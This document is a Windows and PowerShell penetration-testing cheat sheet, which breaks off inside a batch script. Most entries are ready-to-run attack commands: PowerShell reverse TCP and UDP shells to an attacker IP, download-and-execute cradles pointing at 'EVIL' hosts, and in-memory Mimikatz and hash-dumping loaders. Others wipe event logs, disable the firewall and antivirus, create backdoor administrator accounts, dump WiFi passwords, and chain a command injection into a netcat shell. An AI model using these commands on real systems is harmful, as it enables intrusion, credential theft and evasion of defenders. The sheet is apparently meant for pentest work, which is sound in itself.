Powershell Commands
Windows Commands¶
- Powershell with the Windows API
- .Net Enumeration and Reflection
- Low-Level Windows API Access From PowerShell
Integrate Linux Commands into Windows with PowerShell and the Windows Subsystem for Linux
Collection Of Powershell Scripts with Framework for Pentesting
SHiPS based provider to navigate CIM classes and namespaces
Hidden WIFI backdoor:
netsh wlan set hostednetwork mode=[allow\|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<password> keyUsage=persistent\|temporary
netsh wlan [start|stop] hostednetwork
Allow program/service/port through Firewall:
netsh firewall set service type = remotedesktop mode = enable
netsh firewall add allowedprogram C:\nltest.exe mltest enable
netsh firewall add portopening tcp 2482 lt enable all
Tunnel Traffic Natively with Windows:
netsh int portproxy v4tov4 listenport=80 connecthost=[AttackerIP] connectport=80
List other shares:
net view \\fileserv /all
Powershell Downloader:
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"
Download and run program:
powershell (new-object System.Net.WebClient).DownloadFile('http://rmccurdy.com/scripts/quickvnc.exe','%TEMP%\quickvnc.exe');Start-Process "%TEMP%\quickvnc.exe"
Wipe Event logs:
powershell -command " wevtutil el | Foreach-Object {Write-Host 'Clearing $_'; wevtutil cl '$_'}"
Get external IP:
powershell -command "$(Resolve-DnsName -Name myip.opendns.com -Server 208.67.222.220).IPAddress
Bitsadmin Download/Exec¶
Make the backdoor:
bitsadmin /create backdoor
bitsadmin /addfile backdoor http://192.168.20.10/theshell.exe C:\windows\temp\theshell.exe
bitsadmin /SETMINRETRYDELAY 88000
bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL
Check the backdoor is set up correctly:
bitsadmin /getnotifycmdline backdoor
bitsadmin /listfiles backdoor
Run the backdoor:
bitsadmin /RESUME backdoor
WMI Commands¶
Spot Odd Executables - wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath
Look at services that are set to start automatically - wmic SERVICE WHERE StartMode="Auto" GET Name, State
Find user-created shares (usually not hidden) - wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path
Find stuff that starts on boot - wmic STARTUP GET Caption, Command, User
Identify any local system accounts that are enabled (guest, etc.) - wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name"
Change Start Mode of Service - wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled
Number of Logons Per USERID - wmic netlogin where (name like "%skodo") get numberoflogons
Obtain a Certain Kind of Event from Eventlog - wmic ntevent where (message like "%logon%") list brief
Clear the Eventlog (Security example) - wmic nteventlog where (description like "%secevent%") call cleareventlog
Get Mac Address - wmic nic get macaddress
Reboot or Shutdown - wmic os where buildnumber="2600" call reboot
Update static IP address - wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")
Change network gateway - wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)
Enable DHCP - wmic nicconfig where index=9 call enabledhcp
Service Management - wmic service where caption="DHCP Client" call changestartmode "Disabled"
Start an Application - wmic process call create "calc.exe"
Terminate an Application - wmic process where name="calc.exe" call terminate
Change Process Priority - wmic process where name="explorer.exe" call setpriority 64
Get List of Process Identifiers - wmic process where (Name='svchost.exe') get name,processid
Information About Harddrives - wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber
Information about os - wmic os get bootdevice, buildnumber, caption, freespaceinpagingfiles, installdate, name, systemdrive, windowsdirectory /format:htable > c:osinfo.htm
Information about files - wmic path cim_datafile where "Path='windowssystem32wbem' and FileSize>1784088" > c:wbemfiles.txt
Process list - wmic process get /format:htable > c:process.htm
Retrieve list of warning and error events not from system or security logs - WMIC NTEVENT WHERE "EventType<3 AND LogFile != 'System' AND LogFile != 'Security'" GET LogFile, SourceName, EventType, Message, TimeGenerated /FORMAT:"htable.xsl":" datatype = number":" sortby = EventType" > c:appevent.htm
Total Hard Drive Space Check - wmic LOGICALDISK LIST BRIEF
Get Running Services Information - Wmic service where (state=â€runningâ€) get caption, name, startmode, state
Get Startmode of Services - Wmic service get caption, name, startmode, state
Get Domain Names And When Account PWD set to Expire - WMIC UserAccount GET name,PasswordExpires /Value
Get Hotfix and Security Patch Information - WMIC QFE GET /format:CSV >QFE.CSV
Get Startup List - wmic startup list full
Find a specific Process - wmic process list brief - find "cmd.exe"
Get List of IP Interfaces - wmic nicconfig where IPEnabled='true'
Change IP Address - wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.255.255.0")
OS/System Report HTML Formatted - wmic /output:c:os.html os get /format:hform
Products/Programs Installed Report HTML Formatted - wmic /output:c:product.html product get /format:hform
Services Report on a Remote Machine HTML Formatted - wmic /output:c:services.htm /node:server1 service list full / format:htable
Turn on Remoted Desktop Remotely! - Wmic /node:"servername" /user:"user@domain" /password: "password"
RDToggle where ServerName="server name" call SetAllowTSConnections 1
Get Server Drive Space Usage Remotely - WMIC /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV
Get PC Serial Number - wmic /node:â€HOST†bios get serialnumber
Get PC Product Number - wmic /node:â€HOST†baseboard get product
Get Services for Remote Machine in HTML Format - wmic /output:c:services.htm /node:server1 service list full / format:htable
Search for Stored Credentials¶
Metasploit Framework enum_unattend module and gather credentials module:
- http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
- http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
findstr /S pass *.txt *.xml *.ini // in C:\
#find out what groups a user is part of
net user <userName> /domain | find "Group"
Users and Permissions¶
Add a user on windows:
net user $username $password /add
Add a user to the “Remote Desktop Users” group:
net localgroup "Remote Desktop Users" $username /add
Make a user an administrator:
net localgroup administrators $username /add
Network¶
Disable Windows firewall on newer versions:
NetSh Advfirewall set allprofiles state off
Disable windows firewall on older windows:
netsh firewall set opmode disable
Port forwarding to remote host:
netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>
Wireless Backdoor Creation:
netsh wlan set hostednetwork mode=[allow\|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent\|temporary
netsh wlan [start|stop] hostednetwork
Dump DNS Zones:
Get-DnsRecord -RecordType A -ZoneName FQDN -Server ServerName | % {Add-Content -Value $_ -Path filename.txt}
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_AType WHERE ContainerName='domain.com'"
Pass the Hash Windows¶
pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe
after % starts the password
"aad3b435b51404eeaad3b435b51404ee" is the blank LM hash
Pass the Hash
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE alice@localhost
Exec commands on remote Windows machine
PsExec.exe \\10.11.1.49 -u alice -p somepasswd cmd
get a file from Kali to the remote Windows machine
TFTP.EXE -i 10.11.1.49 get PsExec64.exe
remote port forwarding from Windows -> Kali
plink.exe -l root -pw Parolaroot -R 445:127.0.0.1:445
Redirect port with plink.exe
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185 ##redirects the Windows port 445 to Kali on port 22
SYSINTERNALS¶
use the -accepteula to avoid the GUI asking to accept...EULA
PsExec.exe –accepteula
PsExec64.exe -accepteula \\10.11.1.49 -u user -p somepassword cmd
powershell -ExecutionPolicy Bypass C:\Users\Public\PsExec.exe -accepteula \\localhost -u alice -p XXXX cmd
- PsExec - execute processes remotely
- PsFile - shows files opened remotely
- PsGetSid - display the SID of a computer or a user
- PsInfo - list information about a system
- PsPing - measure network performance
- PsKill - kill processes by name or process ID
- PsList - list detailed information about processes
- PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
- PsLogList - dump event log records
- PsPasswd - changes account passwords
- PsService - view and control services
- PsShutdown - shuts down and optionally reboots a computer
- PsSuspend - suspends processes
- PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)
Windows Persistance¶
Add Windows user:
net user /add hacker 1234567
Add user to Administrators groups
net localgroup administrators /add hacker
Add user to Remote Desktop user group
net localgroup "Remote Desktop users" hacker /add
Start Remote Desktop service
net start TermService
Is Remote Desktop Service running?
tasklist /svc | findstr /C:TermService
Permanently enable Terminal Services
sc config TermService start=auto
Enable Terminal services through registry // reboot after
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
DLL Injection¶
Run Custom DLL
rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll
Run CMD when disabled
rundll32 C:\cmd.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\cmd.dll
Run Regedit
rundll32 C:\regedit.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\regedit.dll
Inject DLL in to running process
Remote DLL Injector
RemoteFLLInjector64.exe <ProcessID> <DLL file>
Using Powersploit
Invoke-DLLInjection -ProcessID <ProcessID> -Dll <DLLfile>
Using Windows Exec
Mavinject32.exe <PID> /INJECTRUNNING <DLL PATH>
Mavinject64.exe <PID> /INJECTRUNNING <DLL PATH>
Mavinject.exe <PID> /INJECTRUNNING <DLL PATH>
IstallUtil.exe /U <DLL PATH>
UAC Bypass¶
Bypass with Windows Installer (Removed in Windows 10)
makecab C:\Some\Evil.dll C:\Some\Suspicious.cab
wusa C:\Some\Suspicious.cab /extract:C:\Windows\Some\Path
Bypass with IFileOperation COM Object
IFileOperation.MoveItem ("C:\Some\Source.file","C:\Some\Destination\Path\","Destination.file")
IFileOperation.PerformOperations()
Binary Information¶
Which programs have auto Elevate privlages
Get-Content -Path C:\Windows\System32\Taskmgr.exe |Select-String -Pattern "autoElevate"
View all in folder
Get-AutoElevate-Path C:\Windows\system32 -MaxDepth 1
Domain Information¶
Finding the Domain Controler:
echo %LOGONSERVER%.
nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)
Setting up a Domain Server¶
Install Active Directory:
Install-WindowsFeature -name AD-Domain-Services -IncludeManagementTools
Create a new Active Directory Domain:
Import-Module ADDSDeployment
#Initiate the new Active Directory:
Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\Windows\NTDS" -DomainMode "Win2012R2" `
-DomainName "raymii.nl" -DomainNetbiosName "RAYMII" -ForestMode "Win2012R2" -InstallDns:$true `
-LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\Windows\SYSVOL" -Force:$true
Add a server to a domain:
#First test the existing domain to make sure you can join:
Test-ADDSForestInstallation -DomainName raymii.nl
#Add the server to the domain as a backup domain controller:
Install-ADDSDomainController -InstallDns -Credential (Get-Credential RAYMII\Administrator) -DomainName raymii.nl
Create an Active Directory user account:
New-ADUser -Name "John Doe" -GivenName John -Surname Doe `
-SamAccountName jdoe -UserPrincipalName jdoe@craymii.nl `
-AccountPassword (Read-Host -AsSecureString "hunter2") `
-PassThru | Enable-ADAccount
Create an Active Directory group:
#Use the below command to create a new global group in the default Users folder of Active Directory called "Managers":
New-ADGroup -name "Managers" -groupscope Global
#If it needs to exist in different path in Active Directory, specify the path by its distinguished name:
New-ADGroup -name "Managers" -groupscope Global -path "OU=OtherOU,DC=Raymii,DC=nl"
Add user to a group:
#The below command adds the user jdoe to the Managers group:
Add-ADGroupMember -Identity "Managers" -Member "jdoe"
#To add a user in a different OU to a group in a different OU, you can specify the full DN:
Add-ADGroupMember -Identity "CN=SupportSlavesGroup,OU=SupportSlaves,DC=raymii,DC=nl" -Members "CN=jdoe,OU=OtherUserOU,DC=raymii,DC=nl"
Install Microsoft Exchange 2013:
#Install the RSAT-DSS role via Powershell:
Install-WindowsFeature RSAT-ADDS
#We prepare the forest for the instalation of Exchange. First the Schema:
setup /ps /IAcceptExchangeServerLicenseTerms
#The Active Directory:
setup /PrepareAD /OrganizationName:"Raymii" /IAcceptExchangeServerLicenseTerms
#The Domain itself:
setup /pd /IAcceptExchangeServerLicenseTerms
#Install other required components and features for Exchange:
Install-WindowsFeature AS-HTTP-Activation, Desktop-Experience, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation
#You need to download and install the following setups manually from the Microsoft website and install them in the order listed below:
# Unified Communications Managed API 4.0 Runtime
# Microsoft Office 2010 Filter Pack 64 bit
# Microsoft Office 2010 Filter Pack SP1 64 bit
#Start the actual Exchange installation:
setup /m:Install /Roles:ca,mb,mt /IAcceptExchangeServerLicenseTerms /InstallWindowsComponents /DBFilePath:"E:\EXCHANGE\MDB001.edb" /LogFolderPath:"E:\EXCHANGE" /MdbName:"MDB001"
WebDL and execute¶
powershell -ExecutionPolicy Bypass -noLogo -Command Import-Module BitsTransfer;Start-BitsTransfer [http://www.illmob.org/test.exe](http://www.illmob.org/test.exe) test.exe;./test.exe;
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('[http://illmob.org/test.exe','test.exe');./test.exe](http://illmob.org/test.exe','test.exe');./test.exe);
powershell -ExecutionPolicy Bypass -noLogo -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('[http://bit.ly/L3g1t'](http://bit.ly/L3g1t'))
Reverse TCP Shell¶
$client = New-Object System.Net.Sockets.TCPClient("**192.168.1.100**",**4444**);$stream = $client.GetStream();\[byte\[\]\]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = (\[text.encoding\]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Reverse UDP Shell¶
$endpoint = New-Object System.Net.IPEndPoint (\[System.Net.IPAddress\]::Parse("**192.168.1.100**"),53);$client = New-Object System.Net.Sockets.UDPClient(53);\[byte\[\]\]$bytes = 0..65535|%{0};$sendbytes = (\[text.encoding\]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive(\[ref\]$endpoint);$returndata = (\[text.encoding\]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = (\[text.encoding\]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()
WebDL and execute mimikatz totally in memory¶
Uses Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory to dump credentials without ever writing the mimikatz binary to disk. Dump all domain creds with mimikatz
powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/oeoFuI'](http://is.gd/oeoFuI')); Invoke-Mimikatz -DumpCreds"
This Invoke-Mimikatz.cs.ps1 Invokes x86 or x64 Mimiktaz Inside of PowerShell Process
powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/BD2toB'](http://is.gd/BD2toB')); Invoke-Mimikatz -DumpCreds"
WebDL and execute hashdump totally in memory¶
Hashes are dumped using a modified version of powerdump script from MSF written by David Kennedy. Administrator privileges are required for this script
powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/MHa1Bj'](http://is.gd/MHa1Bj')); Get-PassHashes"
WebDL and execute Get-VaultCredential totally in memory¶
Get-VaultCredential enumerates and displays all credentials stored in the Windows vault. Web credentials, specifically are displayed in cleartext.
powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/57uScy'](http://is.gd/57uScy')); Get-VaultCredential"
WebDL and execute LSA Secrets totally in memory¶
Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer. The payload must be run with elevated permissions, in 32-bit mode and requires permissions to the security key in HKLM. The permission could be obtained by using Enable-DuplicateToken payload.
powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/qhgsX1'](http://is.gd/qhgsX1'));"
Dump stored Autologon password¶
Get-ItemProperty -Path 'HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' | select defaultusername,defaultpassword
Dump WIFI Passwords¶
$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$\_.ToString()}
$exportdata = $wlans | Foreach-Object {$\_.Replace(" All User Profile : ",$null)}
$exportdata | ForEach-Object {netsh wlan show profiles name="$\_" key=clear}
(netsh wlan show profiles) | Select-String "\\:(.+)$" | %{$name=$\_.Matches.Groups\[1\].Value.Trim(); $\_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\\W+\\:(.+)$" | %{$pass=$\_.Matches.Groups\[1\].Value.Trim(); $\_} | %{\[PSCustomObject\]@{ PROFILE\_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
(netsh wlan show profiles) | Select-String "\\:(.+)$" | %{$name=$\_.Matches | % {$\_.Groups\[1\].Value.Trim()}; $\_} |%{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\\W+\\:(.+)$" | %{$pass=$\_.Matches | % {$\_.Groups\[1\].Value.Trim()}; $\_} | %{\[PSCustomObject\]@{ PROFILE\_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
foreach($profil in (netsh wlan show profiles | Select-String ':')){foreach($line in (netsh wlan show profiles name=($profil.toString().split(':')\[1\].trim()) key=clear)){$line+';'}};
SID2USER¶
((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate(\[System.Security.Principal.NTAccount\])).value
USERS2SID & Last Logon¶
gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expression={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto
Query Domain Admins¶
Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"
Query Process/Service¶
gps | ?{$\_.name -match "<process/service name>"} | ?{$\_.id -match "<process/service id>"} | select \*
Query Drives¶
[System.IO.DriveInfo]::GetDrives()
WEbInject callback¶
127.0.0.1 | powershell.exe (new-object System.Net.WebClient).Downloadfile('[http://192.168.1.107/nc.exe'](http://192.168.1.107/nc.exe'), 'nc.exe')
Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat:
127.0.0.1 | nc.exe -e cmd.exe 192.168.1.107 21
Port Scan¶
PS C:\\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$\_)) "Port $\_ is open!"} 2>$null
Ping Sweep¶
PS C:\\> 1..255 | % {echo "10.10.10.$\_"; ping -n 1 -w 100 10.10.10.$\_ | SelectString ttl}
Find Files¶
PS C:\\> Get-ChildItem "C:\\Users\\" - recurse -include \*passwords\*.txt
Text 2 Speech¶
powershell (New-Object -ComObject Sapi.SpVoice).Speak(('All Your Base R Belong To Us.'))
```powershell
Other Resources: [Nishang Github](https://github.com/samratashok/)
### Download Cradles
from [https://gist.github.com/HarmJ0y/bb48307ffa663256e239](https://gist.github.com/HarmJ0y/bb48307ffa663256e239)
```powershell
# 1. normal download cradle
IEX (New-Object Net.Webclient).downloadstring("[http://EVIL/evil.ps1](http://EVIL/evil.ps1)")
# 2. PowerShell 3.0+
IEX (iwr '[http://EVIL/evil.ps1'](http://EVIL/evil.ps1'))
# 3. hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('[http://EVIL/evil.ps1');start-sleep](http://EVIL/evil.ps1');start-sleep) -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# 4. Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','[http://EVIL/evil.ps1',$false);$h.send();iex](http://EVIL/evil.ps1',$false);$h.send();iex) $h.responseText
# 5. WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','[http://EVIL/evil.ps1',$false);$h.send();iex](http://EVIL/evil.ps1',$false);$h.send();iex) $h.responseText
# 6. using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer '[http://EVIL/evil.ps1'](http://EVIL/evil.ps1') $env:temp\\t;$r=gc $env:temp\\t;rm $env:temp\\t; iex $r
# 7. DNS TXT approach from PowerBreach ([https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1))
# 8. code to execute needs to be a base64 encoded string stored in a TXT record
IEX (\[System.Text.Encoding\]::UTF8.GetString(\[System.Convert\]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"\*"') -split '"'\[0\]))))
# 9. from @subtee - [https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d](https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d)
<#
<?xml version="1.0"?>
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("[https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt](https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt)")
$a.command.a.execute | iex
Using Microsoft's SyncAppvPublishingServer to download and execute a PowerShell file!¶
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('{}') | IEX
Passing msi file url to the Windows installer will download and execute it!¶
msiexec /i {}
Windows Remote Management provides the ability to remotely execute wmi commands.¶
winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}
Uses certutil to download your base64 encoded dll file like a txt file to avoid suspicion.¶
certutil -urlcache -split -f {} google_https_cert.txt && certutil -decode google_https_cert.txt https_cert.dll && regsvr32 /s /u https_cert.dll
Uses certutil to download your exe file like a cert file to avoid suspicion.¶
certutil.exe -urlcache -split -f {} google_https_cert.exe && google_https_cert.exe
Using windows's control panel to load a dll file!¶
control.exe {your_dll_file}
Using the .NET compiler to compile a c# payload locally that can then be executed.¶
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}
Uses forfiles to execute commands without using cmd.¶
forfiles /p c:\windows\system32 /m notepad.exe /c {Here_your_command}
Uses mshta command to download and execute your hta file.¶
mshta {}
Using microsoft's office word to load a dll file!¶
winword /l {your_dll_file}
Using rundll32.exe to download and execute a PowerShell file.¶
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{}');"
Search for vulnerable service privilege opportunities using script from PowerTools¶
Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
PowerVeiw and output localy to disk for beacon:¶
powershell -no -exec bypass -command "& {Import-Module .\PowerView.ps1; Invoke-UserHunter USRNAME | Out-File -Encoding Ascii USERNAME.txt}"
Powerview UserHunting Search by keyword:¶
powershell Get-NetUser -Filter "(description=*medical*)" | Select-Object -Prop samaccountname.description,title
powershell Get-NetUser -Filter "(title=*medical*)" | Select-Object -Prop samaccountname.description,title
Simple Web request:¶
powershell.exe -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.downloadstring('http://google.com/')
List Chrome bookmarks with one line:¶
type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
list all unquoted service paths¶
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Firewall¶
netsh advfirewall show state
netsh advfirewall show config
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name="Exploit" dir=in action=allow program="C:\\exploit.exe" enable=yes
netsh firewall add portopening tcp 2482 lt enable all
Services¶
schtasks /query /fo LIST /v
tasklist /SVC
sc qc Spooler
Enable RDP¶
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG\_DWORD /d 0 /f
Add Admin User¶
net user \[username\] \[password\] /add
net localgroup administrators \[username\] /add
Dump WIFI passwords to .xml¶
netsh wlan export profile key=clear
Dump WIFI SSID/Password oneliner¶
@echo off & for /f "tokens=1\*delims=:" %a in ('netsh wlan show profiles') do (for /f "tokens=\*" %c in ("%~b") do netsh wlan show profile name=%c key=clear) | findstr /c:"Key Content" /c:"SSID name"
OS Name and Version¶
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Transfer File from FTP¶
echo user USERNAME >>c:\\$.tmp && echo PASS >>c:\\$.tmp && echo binary >>c:\\$.tmp && echo get test.exe >>c:\\$.tmp && echo quit >>c:\\$.tmp && ftp -v -i -n -s:c:\\$.tmp ftp.blah.com c:\\$$.tmp && start c:\\test.exe && del c:\\$.tmp && del c:\\$$.tmp
Transfer File from TFTP¶
tftp -i yourserver.com get yourfile.exe && start yourfile.exe
Transfer File from ADODB STREAM FILES¶
echo Dim HTTPGET >>c:\\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\\dl.vbs && echo HTTPGET.Open "GET", "[http://www.illmob.org/test.exe](http://www.illmob.org/test.exe)", false >>c:\\dl.vbs && echo HTTPGET.Send >>c:\\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\\dl.vbs && echo Const adTypeBinary=1 >>c:\\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\\dl.vbs && echo Dim SendBinary >>c:\\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\\dl.vbs && echo SendBinary.Open >>c:\\dl.vbs && echo SendBinary.Write DataBin >>c:\\dl.vbs && echo SendBinary.SaveToFile "c:\\test.exe", adSaveCreateOverWrite >>c:\\dl.vbs && cscript //Nologo /B c:\\dl.vbs && start c:\\test.exe && del /s c:\\dl.vbs
re-enable ADODB stream if patched
echo Windows Registry Editor Version 5.00 >>c:\\fix.reg && echo \[HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{00000566-0000-0010-8000-00AA006D2EA4}\] >>c:\\fix.reg && echo "Compatibility Flags"=- >>c:\\fix.reg && regedit /s c:\\fix.reg
WebDL using CertUtil¶
certutil -urlcache -split -f [http://illmob.org/test.exe](http://illmob.org/test.exe) && start yourfile.exe
Mount Windows Share with Null Session¶
net use x: \\\\server\\share "" /u:
Disable Symantec Endpoint Protection¶
c:\\program files\\symantec\\symantec endpoint protection\\smc -stop
AT Command Execution¶
at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"
schtasks /create /tn rb /tr "c:\\EVIL.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""
Run external Windows Script Component (pops calc.exe)¶
regsvr32 /s /n /u /i:[http://bit.ly/1S8dRjL](http://bit.ly/1S8dRjL) scrobj.dll
Run Sysinternals programs¶
pushd \\live.sysinternals.com && autoruns /accepteula && pause && popd
Find unquoted service paths without access to wmic. Need to run both of these to catch services with spaces in their names:¶
for /f "tokens=2" %i in ('sc query ^|findstr "SERVICE\_NAME"') do sc qc %i | findstr "BINARY\_PATH\_NAME" >> output.txt
for /f "tokens=2\*" %i in ('sc query ^|findstr "SERVICE\_NAME"') do sc qc "%i %j" | findstr "BINARY\_PATH\_NAME" >> output.txt
BatterUp.bat¶
Check permissions on services
@echo off
REM Batch port of selected modules from PowerUp by harmj0y
REM Author: @\_wald0
SETLOCAL ENABLEDELAYEDEXPANSION
REM ======================================
REM = Find unquoted service binary paths =
REM ======================================
echo(
echo Finding unquoted service binary paths...
echo(
for /f "tokens=2\* delims=:" %%i in ('sc query ^|findstr "SERVICE\_NAME"') do (
set str=%%i
set str=!str:~1!
sc qc "!str!" | findstr "BINARY\_PATH\_NAME" | findstr /iv "c:\\windows\\\\" | findstr /iv """
)
REM ========================================================================
REM = Check permissions on services =
REM = Technique stolen from PowerUp by harmj0y =
REM = https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1#L104-L141 =
REM ========================================================================
echo(
echo Finding service binaries your user has write access to...
echo(
for /f "tokens=2\* delims=:" %%i in ('sc query ^|findstr "SERVICE\_NAME"') do (
